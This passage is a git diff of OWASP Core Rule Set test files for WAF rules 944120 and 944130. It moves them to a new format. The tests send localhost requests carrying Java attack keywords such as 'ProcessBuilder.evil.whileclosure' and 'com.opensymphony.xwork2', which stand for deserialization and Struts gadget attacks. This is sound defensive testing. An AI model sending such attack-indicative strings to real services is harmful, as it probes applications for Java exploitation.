"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.prototypeserializationfactory - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-119 + ProcessBuilder.evil.prototypeserializationfactory + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 119 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.prototypeserializationfactory - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-120 + ProcessBuilder.evil.prototypeserializationfactory + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 120 desc: "Argument test includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.whileclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-121 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.whileclosure" + output: + log: + expect_ids: [944120] + - test_id: 121 desc: "Argument name includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.whileclosure=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-122 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.whileclosure=test" + output: + log: + expect_ids: [944120] + - test_id: 122 desc: "Cookie test includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.whileclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-123 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.whileclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 123 desc: "Cookie name includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.whileclosure=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-124 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.whileclosure=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 124 desc: "Request header test includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.whileclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-125 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.whileclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 125 desc: "XML element includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-126 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944120] + - test_id: 126 desc: "XML attribute name includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-127 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944120] + - test_id: 127 desc: "XML attribute value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-128 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944120] + - test_id: 128 desc: "XML element value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.whileclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-129 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.whileclosure" + output: + log: + expect_ids: [944120] + - test_id: 129 desc: "Nested XML element value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.whileclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-130 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.whileclosure" + output: + log: + expect_ids: [944120] + - test_id: 130 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.whileclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-131 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.whileclosure" + output: + log: + expect_ids: [944120] + - test_id: 131 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - {"test": "ProcessBuilder.evil.whileclosure"} - output: - log_contains: "id \"944120\"" - - test_title: 944120-132 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + {"test": "ProcessBuilder.evil.whileclosure"} + output: + log: + expect_ids: [944120] + - test_id: 132 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - {"ProcessBuilder.evil.whileclosure": "test"} - output: - log_contains: "id \"944120\"" - - test_title: 944120-133 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + {"ProcessBuilder.evil.whileclosure": "test"} + output: + log: + expect_ids: [944120] + - test_id: 133 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.whileclosure": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-134 + {"ProcessBuilder.evil.whileclosure": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 134 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.whileclosure": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-135 + {"ProcessBuilder.evil.whileclosure": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 135 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.whileclosure - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-136 + ProcessBuilder.evil.whileclosure + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 136 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.whileclosure - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" + ProcessBuilder.evil.whileclosure + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] diff --git a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml index 163bba9..b08f7b2 100644 --- a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml +++ b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml @@ -1,8481 +1,8479 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944130.yaml" - description: "Positive tests for rule 944130" +rule_id: 944130 tests: - - test_title: 944130-1 + - test_id: 1 desc: "Argument test includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=com.opensymphony.xwork2" - output: - log_contains: "id \"944130\"" - - test_title: 944130-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=com.opensymphony.xwork2" + output: + log: + expect_ids: [944130] + - test_id: 2 desc: "Argument name includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "com.opensymphony.xwork2=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "com.opensymphony.xwork2=test" + output: + log: + expect_ids: [944130] + - test_id: 3 desc: "Cookie test includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=com.opensymphony.xwork2 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=com.opensymphony.xwork2 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 4 desc: "Cookie name includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: com.opensymphony.xwork2=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: com.opensymphony.xwork2=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 5 desc: "Request header test includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: com.opensymphony.xwork2 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: com.opensymphony.xwork2 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 6 desc: "XML attribute value includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 7 desc: "XML element value includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: 